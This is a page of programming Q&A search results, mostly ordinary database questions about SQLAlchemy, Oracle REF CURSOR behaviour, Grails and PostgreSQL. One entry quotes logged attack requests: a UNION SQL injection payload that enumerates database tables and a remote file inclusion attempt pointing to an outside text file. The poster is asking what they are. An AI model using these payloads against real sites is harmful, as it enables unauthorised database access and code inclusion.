Search Results

Search found 10719 results on 429 pages for 'temp tables'.

Page 328/429 | < Previous Page | 324 325 326 327 328 329 330 331 332 333 334 335  | Next Page >

  • How do I do a semijoin using SQLAlchemy?

    - by Jason Baker
    http://en.wikipedia.org/wiki/Relational_algebra#Semijoin Let's say that I have two tables: A and B. I want to make a query that would work similarly to the following SQL statement using the SQLAlchemy orm: SELECT A.* FROM A, B WHERE A.id = B.id AND B.type = 'some type'; The thing is that I'm trying to separate out A and B's logic into different places. So I'd like to make two queries that I can define in separate places: one where A uses B as a subquery, but only returns rows from A. I'm sure this is fairly easy to do, but an example would be nice if someone could show me.

    Read the article

  • Best Ruby ORM for Wrapping around Legacy MSSQL Database?

    - by Technocrat
    Hi. I found this answer and it sounds like almost exactly what I'm doing. I have heard mixed answers about whether or not datamapper can support mssql through dataobjects. Basically, we have an app that uses a consistently structured database, consistently named tables, etc in MSSQL. We're making all kinds of tools and stuff that have to interact with it, some of them remotely and so I decided that we need to create some common, simple access point to do read/write operations on the MSSQL app since it's API is all C# and other things I despise. Now my question is if anyone has any examples or projects they know of where a ruby ORM can essentially create models for another application's legacy database by defining the conventions of each model's pkeys, fkeys, table names, etc. Sequel is the only ORM I've used with MSSQL but never to do anything quite like this. Any suggestions?

    Read the article

  • How to see contents of deployed datasource?

    - by callisto
    I've inherited a project (without a handy handover) that contains reports published to a Reporting Server (2005). MY SSRS knowledge is 4 years stale, so I need your help. I need to edit one of the published reports, is this possible? I also want to peek into the Data Source on the RS, coz that's probably where I can change stuff. I'll add more info as I get a better understanding of what exactly to ask. EDIT: I found a project for some of the reports, opened up in VS2005 BI. Still, how do see where the Data Source gets its data? It brins back 56 fields but I dont know which tables/stored procs/queries are used to get these.

    Read the article

  • after running insert or update query, need the last inserted record and compare in vb.net sql server

    - by ereffe
    i have 2 queries in vb.net with an if clause - if x=0 then insert into table1 else update table1 both queries have 5 fields. now what i want to do is after this insert or update takes place, i need to look at this inserted/updated record and compare it with another table (table2). Especially for update, i have 5 fields in both tables. if any of the 5 fields dont match with table2, then i insert a new record in table 2 which is the updated record in table 1. how can i do this?

    Read the article

  • Is this an injection attempt or a normal request?

    - by CheeseConQueso
    In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example: /?x=19&y=15 The numbers are random, but its always setting x and y variables. Another category of mysterious requests: /?id=http://nic.bupt.edu.cn/media/j1.txt?? There are other attempts at injections in the request log that have straight sql written into them as well. Example: /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13-- It looks like they are all reaching a 404, but I'm still wondering about the intent behind these. I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site which could be the reason. Any suggestions as to what all these are?

    Read the article

  • NHibernateUtil.Initialize and Table where clause (Soft Delete)

    - by Pascal
    We are using NHibernate but sometimes manually load proxies using the NHibernateUtil.Initialize call. We also employ soft delete and have a "where" condition on all our mapping to tables. SQL generated by NHibernate successfully adds the where condition (i.e. DELETED IS NULL) however we notice that NHibernateUtil.Initialize does not observe the constraints of the mapping files. i.e. None of the SQL generated by NHibernateUtil.Initialize observes our DELETED IS NULL condition. Is there something we're missing as we would really like to employ manual loading of some entity collections when the situation demands it. We are using FluentNhibernate for our mapping.

    Read the article

  • How do I create a multiple-table check constraint?

    - by Zack Peterson
    Please imagine this small database... Diagram Tables Volunteer Event Shift EventVolunteer ========= ===== ===== ============== Id Id Id EventId Name Name EventId VolunteerId Email Location VolunteerId Phone Day Description Comment Description Start End Associations Volunteers may sign up for multiple events. Events may be staffed by multiple volunteers. An event may have multiple shifts. A shift belongs to only a single event. A shift may be staffed by only a single volunteer. A volunteer may staff multiple shifts. Check Constraints Can I create a check constraint to enforce that no shift is staffed by a volunteer that's not signed up for that shift's event? Can I create a check constraint to enforce that two overlapping shifts are never staffed by the same volunteer?

    Read the article

  • Getting counts of 0 from a query with a double group by

    - by Maltiriel
    I'm trying to write a query that gets the counts for a table (call it item) categorized by two different things, call them type and code. What I'm hoping for as output is the following: Type Code Count 1 A 3 1 B 0 1 C 10 2 A 0 2 B 13 2 C 2 And so forth. Both type and code are found in lookup tables, and each item can have just one type but more than one code, so there's also a pivot (aka junction or join) table for the codes. I have a query that can get this result: Type Code Count 1 A 3 1 C 10 2 B 13 2 C 2 and it looks like (with join conditions omitted): SELECT typelookup.name, codelookup.name, COUNT(item.id) FROM typelookup LEFT OUTER JOIN item JOIN itemcodepivot RIGHT OUTER JOIN codelookup GROUP BY typelookup.name, codelookup.name Is there any way to alter this query to get the results I'm looking for? This is in MySQL, if that matters. I'm not actually sure this is possible all in one query, but if it is I'd really like to know how. Thanks for any ideas.

    Read the article

  • PL/SQL exception and Java programs

    - by edwards
    Hi Business logic is coded in pl/sql packages procedures and functions. Java programs call pl/sql packages procedures and functions to do database work. pl/sql programs store exceptions into Oracle tables whenever an exception is raised. How would my java programs get the exceptions since the exception instead of being propagated from pl/sql to java is getting persisted to a oracle table and the procs/functions just return 1 or 0. Sorry folks i should have added this constraint much earlier and avoided this confusion. As with many legacy projects we don't have the freedom to modify the stored procedures.

    Read the article

  • Magento - Mage::getModel not working on remote server

    - by Diego
    I'm struggling with an issue for which I can't find an explanation. I have two development environments that I use for my projects. I created a simple module for Magento and I tested it on one environment. After overcoming all Magento's complications, the module works as expected. This is on XAMPP. I then copied the module to the development Linux environment, on a hosted server, and it crashes miserably. I did some debugging, and I found out that a call to Mage::getModel() returns bool(false) instead of the instance of the Model I requested. I double checked all files and directories, and they match. Database is not involved (not from my side, at least, I don't need tables) and both environments have only me as a User, with Admin permissions. Any suggestion on where should I start looking is welcome, thanks.

    Read the article

  • CakePHP HABTM Filtering

    - by James Haigh
    Hi, I've got two tables - users and servers, and for the HABTM relationship, users_servers. Users HABTM servers and vice versa. I'm trying to find a way for Cake to select the servers that a user is assigned to. I'm trying things like $this->User->Server->find('all'); which just returns all the servers, regardless of whether they belong to the user. $this->User->Server->find('all', array('conditions' => array('Server.user_id' => 1))) just gives an unknown column SQL error. I'm sure I'm missing something obvious but just need someone to point me in the right direction. Thanks!

    Read the article

  • How do I reload a Roo project without clearing the database?

    - by Omniwombat
    I've been learning how to build projects using Roo and am making good progress. I have the nucleus of a project which correctly displays my defined entities and allows me to create, edit, and delete the representative objects. I am using mysql at the database and I see that objects entered using the UI correctly appear in the mysql database. Per the Roo instructions, I am starting the webapp using "mvn tomcat:run". Unfortunately, I've discovered that whenever I restart Tomcat using Maven, it clears all of the existing objects out of the database. I'm left with empty tables. It seems to do this as the final step just prior to Tomcat stating that the server has started. I know this is just me being a n00b, but searches haven't been very helpful, none of the project's XML files seem relevant,

    Read the article

  • pitfalls with mixing storage engines in mysql with django?

    - by Dave Orr
    I'm running a django system over mysql in amazon's cloud, and the database default is innodb. But now I want to put a fulltext index on a couple of tables for searching, which evidently requires myisam. The obvious solution is to just tell mysql to ALTER TABLE to myisam, but are there going to be any issues with that? One that comes to mind is that I'll have to remember to do that any time I build a new version of the database, which should theoretically be rare, but there doesn't seem to be a way to tell django to please set the storage engine at the table level. I guess I could write a migration (we use south). Any other things I might be missing? What could possibly go wrong?

    Read the article

  • replacing data.frame element-wise operations with data.table (that used rowname)

    - by Harold
    So lets say I have the following data.frames: df1 <- data.frame(y = 1:10, z = rnorm(10), row.names = letters[1:10]) df2 <- data.frame(y = c(rep(2, 5), rep(5, 5)), z = rnorm(10), row.names = letters[1:10]) And perhaps the "equivalent" data.tables: dt1 <- data.table(x = rownames(df1), df1, key = 'x') dt2 <- data.table(x = rownames(df2), df2, key = 'x') If I want to do element-wise operations between df1 and df2, they look something like dfRes <- df1 / df2 And rownames() is preserved: R> head(dfRes) y z a 0.5 3.1405463 b 1.0 1.2925200 c 1.5 1.4137930 d 2.0 -0.5532855 e 2.5 -0.0998303 f 1.2 -1.6236294 My poor understanding of data.table says the same operation should look like this: dtRes <- dt1[, !'x', with = F] / dt2[, !'x', with = F] dtRes[, x := dt1[,x,]] setkey(dtRes, x) (setkey optional) Is there a more data.table-esque way of doing this? As a slightly related aside, more generally, I would have other columns such as factors in each data.table and I would like to omit those columns while doing the element-wise operations, but still have them in the result. Does this make sense? Thanks!

    Read the article

  • Why is Postgres doing a Hash in this query?

    - by Claudiu
    I have two tables: A and P. I want to get information out of all rows in A whose id is in a temporary table I created, tmp_ids. However, there is additional information about A in the P table, foo, and I want to get this info as well. I have the following query: SELECT A.H_id AS hid, A.id AS aid, P.foo, A.pos, A.size FROM tmp_ids, P, A WHERE tmp_ids.id = A.H_id AND P.id = A.P_id I noticed it going slowly, and when I asked Postgres to explain, I noticed that it combines tmp_ids with an index on A I created for H_id with a nested loop. However, it hashes all of P before doing a Hash join with the result of the first merge. P is quite large and I think this is what's taking all the time. Why would it create a hash there? P.id is P's primary key, and A.P_id has an index of its own.

    Read the article

  • Custom session state provider needed for DB storage?

    - by subt13
    I know this question is related to many others, but please bear with me. I am trying an experiment to store all information in database tables instead of the ASP.NET session. In ASP.NET 4 one can create a custom provider for session. So, again should I implement a Custom Session-State Provider or should I just disable session (in Web.config)? Thanks! From the comments my question can be misunderstood. Hopefully this tidbit will help clarify: I don't want to store the session in the database. I want to store information in the database that you would typically store in the session. One reason why: I don't want to carry around a session on every page, especially if that page doesn't care about 90 percent of the information in the session

    Read the article

  • SQL Server - Select one random record not showing duplicates

    - by Lukes123
    I have two tables, events and photos, which relate together via the 'Event_ID' column. I wish to select ONE random photo from each event and display them. How can I do this? I have the following which displays all the photos which are associated. How can I limit it to one per event? SELECT Photos.Photo_Id, Photos.Photo_Path, Photos.Event_Id, Events.Event_Title, Events.Event_StartDate, Events.Event_EndDate FROM Photos, Events WHERE Photos.Event_Id = Events.Event_Id AND Events.Event_EndDate < GETDATE() AND Events.Event_EndDate IS NOT NULL AND Events.Event_StartDate IS NOT NULL ORDER BY NEWID() Thanks Luke Stratton

    Read the article

  • Automatically update audit information on Entity

    - by Nix
    I have an entity model that has audit information on every table (50+ tables) CreateDate CreateUser UpdateDate UpdateUser Currently we are programatically updating audit information. Ex: if(changed){ entity.UpdatedOn = DateTime.Now; entity.UpdatedBy = Environment.UserName; context.SaveChanges(); } But I am looking for a more automated solution. During save changes, if an entity is created/updated I would like to automatically update these fields before sending them to the database for storage. Any suggestion on how i could do this? Let me know if any more information is needed.

    Read the article

  • Different behavior for REF CURSOR between Oracle 10g and 11g when unique index present?

    - by wweicker
    Description I have an Oracle stored procedure that has been running for 7 or so years both locally on development instances and on multiple client test and production instances running Oracle 8, then 9, then 10, and recently 11. It has worked consistently until the upgrade to Oracle 11g. Basically, the procedure opens a reference cursor, updates a table then completes. In 10g the cursor will contain the expected results but in 11g the cursor will be empty. No DML or DDL changed after the upgrade to 11g. This behavior is consistent on every 10g or 11g instance I've tried (10.2.0.3, 10.2.0.4, 11.1.0.7, 11.2.0.1 - all running on Windows). The specific code is much more complicated but to explain the issue in somewhat realistic overview: I have some data in a header table and a bunch of child tables that will be output to PDF. The header table has a boolean (NUMBER(1) where 0 is false and 1 is true) column indicating whether that data has been processed yet. The view is limited to only show rows in that have not been processed (the view also joins on some other tables, makes some inline queries and function calls, etc). So at the time when the cursor is opened, the view shows one or more rows, then after the cursor is opened an update statement runs to flip the flag in the header table, a commit is issued, then the procedure completes. On 10g, the cursor opens, it contains the row, then the update statement flips the flag and running the procedure a second time would yield no data. On 11g, the cursor never contains the row, it's as if the cursor does not open until after the update statement runs. I'm concerned that something may have changed in 11g (hopefully a setting that can be configured) that might affect other procedures and other applications. What I'd like to know is whether anyone knows why the behavior is different between the two database versions and whether the issue can be resolved without code changes. Update 1: I managed to track the issue down to a unique constraint. It seems that when the unique constraint is present in 11g the issue is reproducible 100% of the time regardless of whether I'm running the real world code against the actual objects or the following simple example. Update 2: I was able to completely eliminate the view from the equation. I have updated the simple example to show the problem exists even when querying directly against the table. Simple Example CREATE TABLE tbl1 ( col1 VARCHAR2(10), col2 NUMBER(1) ); INSERT INTO tbl1 (col1, col2) VALUES ('TEST1', 0); /* View is no longer required to demonstrate the problem CREATE OR REPLACE VIEW vw1 (col1, col2) AS SELECT col1, col2 FROM tbl1 WHERE col2 = 0; */ CREATE OR REPLACE PACKAGE pkg1 AS TYPE refWEB_CURSOR IS REF CURSOR; PROCEDURE proc1 (crs OUT refWEB_CURSOR); END pkg1; CREATE OR REPLACE PACKAGE BODY pkg1 IS PROCEDURE proc1 (crs OUT refWEB_CURSOR) IS BEGIN OPEN crs FOR SELECT col1 FROM tbl1 WHERE col1 = 'TEST1' AND col2 = 0; UPDATE tbl1 SET col2 = 1 WHERE col1 = 'TEST1'; COMMIT; END proc1; END pkg1; Anonymous Block Demo DECLARE crs1 pkg1.refWEB_CURSOR; TYPE rectype1 IS RECORD ( col1 vw1.col1%TYPE ); rec1 rectype1; BEGIN pkg1.proc1 ( crs1 ); DBMS_OUTPUT.PUT_LINE('begin first test'); LOOP FETCH crs1 INTO rec1; EXIT WHEN crs1%NOTFOUND; DBMS_OUTPUT.PUT_LINE(rec1.col1); END LOOP; DBMS_OUTPUT.PUT_LINE('end first test'); END; /* After creating this index, the problem is seen */ CREATE UNIQUE INDEX unique_col1 ON tbl1 (col1); /* Reset data to initial values */ TRUNCATE TABLE tbl1; INSERT INTO tbl1 (col1, col2) VALUES ('TEST1', 0); DECLARE crs1 pkg1.refWEB_CURSOR; TYPE rectype1 IS RECORD ( col1 vw1.col1%TYPE ); rec1 rectype1; BEGIN pkg1.proc1 ( crs1 ); DBMS_OUTPUT.PUT_LINE('begin second test'); LOOP FETCH crs1 INTO rec1; EXIT WHEN crs1%NOTFOUND; DBMS_OUTPUT.PUT_LINE(rec1.col1); END LOOP; DBMS_OUTPUT.PUT_LINE('end second test'); END; Example of what the output on 10g would be:   begin first test   TEST1   end first test   begin second test   TEST1   end second test Example of what the output on 11g would be:   begin first test   TEST1   end first test   begin second test   end second test Clarification I can't remove the COMMIT because in the real world scenario the procedure is called from a web application. When the data provider on the front end calls the procedure it will issue an implicit COMMIT when disconnecting from the database anyways. So if I remove the COMMIT in the procedure then yes, the anonymous block demo would work but the real world scenario would not because the COMMIT would still happen. Question Why is 11g behaving differently? Is there anything I can do other than re-write the code?

    Read the article

  • Grails - Need to restrict fetched rows based on condition on join table

    - by sector7
    Hi guys, I have these two domains Car and Driver which have many-to-many relationship. This association is defined in table tblCarsDrivers which has, not surprisingly, primary keys of both the tables BUT additionally also has a new boolean field deleted. Herein lies the problem. When I find/get query on domain Car, I am fetched all related drivers irrespective of their deleted status in tblCarsDrivers, which is expected. I need to put a clause/constraint to exclude the deleted drivers from the list of fetched records. PS: I tried using an association domain CarDriver in joinTable name but that seems not to work. Apparently it expects only table names, not maps. PPS: I know its unnatural to have any other fields besides the mapping keys in mapping table but this is how I got it and it cant be changed. Car domain is defined as such - class Car { Integer id String name static hasMany = [drivers:Driver] static mapping = { table 'tblCars' version false drivers joinTable:[name: 'tblCarsDrivers',column:'driverid',key:'carid'] } } Thanks!

    Read the article

  • How to achieve "merge" of two data sets with Insert SQL statemen (Oracle DBMS)t?

    - by Roman Kagan
    Hi: What would be the insert SQL statement to merge data from two tables. For example I have events_source_1 table (columns: event_type_id, event_date) and events_source_2 table (same columns) and events_target table (columns: event_type_id, past_event_date nullalbe, future_event_date nullable). Events_source_1 has past events, Events_source_2 has future events and resultant events_target would contain past and future events in the same row for same event_type_id. If there is no past_events but future_events then past_event_date won't be set and only future_event_date will be and the opposite is true too. Thanks a lot in advance for helping me resolving this problem.

    Read the article

  • CakePHP: How can I disable auto-increment on Model.id?

    - by tomws
    CakePHP 1.3.0, mysqli I have a model, Manifest, whose ID should be the unique number from a printed form. However, with Manifest.id set as the primary key, CakePHP is helping me by setting up auto-increment on the field. Is there a way to flag the field via schema.php and/or elsewhere to disable auto-increment? I need just a plain, old primary key without it. The only other solution I can imagine is adding on a separate manifest number field and changing foreign keys in a half dozen other tables. A bit wasteful and not as intuitive.

    Read the article

  • IF/ELSE makes stored procedure not return a result set

    - by Brendan Long
    I have a stored procedure that needs to return something from one of two databases: IF @x = 1 SELECT @y FROM Table_A ELSE IF @x = 2 SELECT @y FROM Table_B Either SELECT alone will return what I want, but adding the IF/ELSE makes it stop returning anything. I tried: IF @x = 1 RETURN SELECT @y FROM Table_A ELSE IF @x = 2 RETURN SELECT @y FROM Table_B But that causes a syntax error. The two options I see are both horrible: Do a UNION and make sure that only one side has any results: SELECT @y FROM Table_A WHERE @x = 1 UNION SELECT @y FROM Table_B WHERE @x = 2 Create a temporary table to store one row in, and create and delete it every time I run this procedure (lots). Neither solution is elegant, and I assume they would both be horrible for performance (unless MS SQL is smart enough not to search the tables when the WHERE class is always false). Is there anything else I can do? Is option 1 not as bad as I think?

    Read the article

  • Symfony 1.4: Deleting a sfGuardUser

    - by Tom
    Hi, I'm having some trouble with the following... I have a sfGuardUser table set up normally, and it has a one-to-one relationship with a Profile table, which contains some additional user info. When a user wants to delete themselves from the site, I'd like to retain their info in the Profile table for various purposes BUT delete the sfGuardUser in order to keep that table cleaner/shorter (not just set it to inactive). I was under the impression that I could set the FK in the Profile table to NULL and then delete the sfGuardUser, but it seems the FK-constraint fails. Indeed, it seems I can't delete either and the queries fail: If I try to delete the sfGuardUser, the Profile table will have an invalid FK If I try to delete a Profile, the sfGuardUser will have an invalid FK Other than leaving outdated sfGuardUsers and Profiles in these tables, or having to use a cascaded delete to get rid of both, can anyone tell me if there's any other way around this? Thank you.

    Read the article

  • What is the effect on record size of reordering columns in PostgreSQL?

    - by Summer
    Since Postgres can only add columns at the end of tables, I end up re-ordering by adding new columns at the end of the table, setting them equal to existing columns, and then dropping the original columns. So, what does PostgreSQL do with the memory that's freed by dropped columns? Does it automatically re-use the memory, so a single record consumes the same amount of space as it did before? But that would require a re-write of the whole table, so to avoid that, does it just keep a bunch of blank space around in each record? Thanks! ~S

    Read the article

< Previous Page | 324 325 326 327 328 329 330 331 332 333 334 335  | Next Page >